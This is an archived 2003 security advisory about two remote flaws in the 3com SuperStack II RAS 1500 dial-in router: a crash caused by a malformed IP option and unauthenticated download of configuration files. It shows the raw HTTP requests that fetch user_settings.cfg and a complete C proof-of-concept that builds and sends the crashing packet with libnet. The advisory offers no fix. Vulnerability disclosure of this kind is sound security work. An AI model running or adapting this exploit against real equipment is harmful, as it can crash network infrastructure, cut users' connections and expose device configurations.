24th Mar 2003 [SBWID-6089]
COMMAND
	3com Remote vulnerabilities
SYSTEMS AFFECTED
	3com RAS 1500, Product: 3C433279A-US Firmware X2.0.10
PROBLEM
	In Piotr Chytla [[email protected]] advisory :
	
	 http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
	
	3com SuperStack II Remote Access  System  1500  is  telco  device  which
	provides access via BRI-ISDN/Analog to dialin  users.  It  contains  two
	remote vulnerabilities, first is Denial Of Service that leads to  system
	crash, second can be used to read configuration files.
	 Details:
	 - -------
	1. Remote Denial of Service
	It is possible to remotely reboot  RAS  1500  (Router  unit)  system  by
	sending malformed packet with ip option len field set to zero. This  bug
	can cause loosing all switched connections on PRI-ISDN interface.
	2. Configuration file read
	Unauthorized user can read configuration and  system  files,  using  web
	interface on RAS 1500 .
	
	    GET /download.htm HTTP/1.0 
	    HTTP/1.0 401 Unauthorized
	    WWW-Authenticate: Basic realm="RAS1500"
	    Content-Type: text/html
	    Server: Allegro-Software-RomPager/2.10
	    GET /user_settings.cfg HTTP/1.0
	    HTTP/1.0 200 OK
	    Content-Type: multipart
	    Date: Mon, 25 May 1998 00:26:38 GMT
	    Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
	    Content-Length: 1258
	    Server: Allegro-Software-RomPager/2.10
	    [..]
	    
	    content of user_setting.cfg
	RAS 1500 requires HTTP basic authorization only for  download.htm  file,
	which is download manager for configuration files and  system  software.
	Unfortunately system images and configuration files  are  not  protected
	by HTTP authorization.
	 Exploit:
	 - --------
	Below is attached a working proof-of-concept exploit  for  vulnerability
	no.1.
	
	- ------X<------isec-options.c------X<------
	/* 
	 * 3com superstack II RAS 1500 remote Denial of Service
	 *
	 * Piotr Chytla <[email protected]>
	 *
	 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
	 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
	 *
	 * (c) 2003 Copyright by iSEC Security Research
	 */
	#include <stdio.h>
	#include <sys/types.h>
	#include <sys/socket.h>
	#include <libnet.h>
	#define OPT_LEN 4
	void usage()
	{
	  printf("Args: \n");
	  printf("-s [source address]\n");
	  printf("-d [destination address]\n");
	}
	int main(int argc,char *argv[]) 
	{
	 char a;
	 int sock,r;
	 u_long src;
	 u_long dst;
	 char pktbuf[IP_MAXPACKET];
	 char payload[]="ABCDEFGHIJKLMNOPRST";
	 u_char options[4];
	 struct ipoption ipopt;
	 bzero(options,OPT_LEN);
	 while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
	 {
	     switch(a) {
	         case 'h' : { usage(); exit(1); }
	         case 's' : { src=libnet_name_resolve(optarg,0); break;}
	         case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
	        }
	 }
	 sock = libnet_open_raw_sock(IPPROTO_RAW);
	 if (sock<0)
	 {
	 perror("socket");
	 exit(1);
	 }
	 libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
	  memcpy(ipopt.ipopt_list, options, OPT_LEN);
	  *(ipopt.ipopt_list)     = 0xe4;
	  *(ipopt.ipopt_list+1)   = 0;
	  *(ipopt.ipopt_list+1)   = 0;
	  *(ipopt.ipopt_list+1)   = 0;
	  r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
	  if (r <0)
	   {
	        libnet_close_raw_sock(sock); 
	        printf("Error ip options insertion failed\n");
	        exit(1);
	   }
	  r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
	  if (r<0)
	  {
	   libnet_close_raw_sock(sock);
	   printf("Error write_ip \n");
	   exit(1);
	  }  
	 libnet_close_raw_sock(sock);
	 return 0;
	}
	- ------X<------isec-options.c------X<------
	
SOLUTION
	?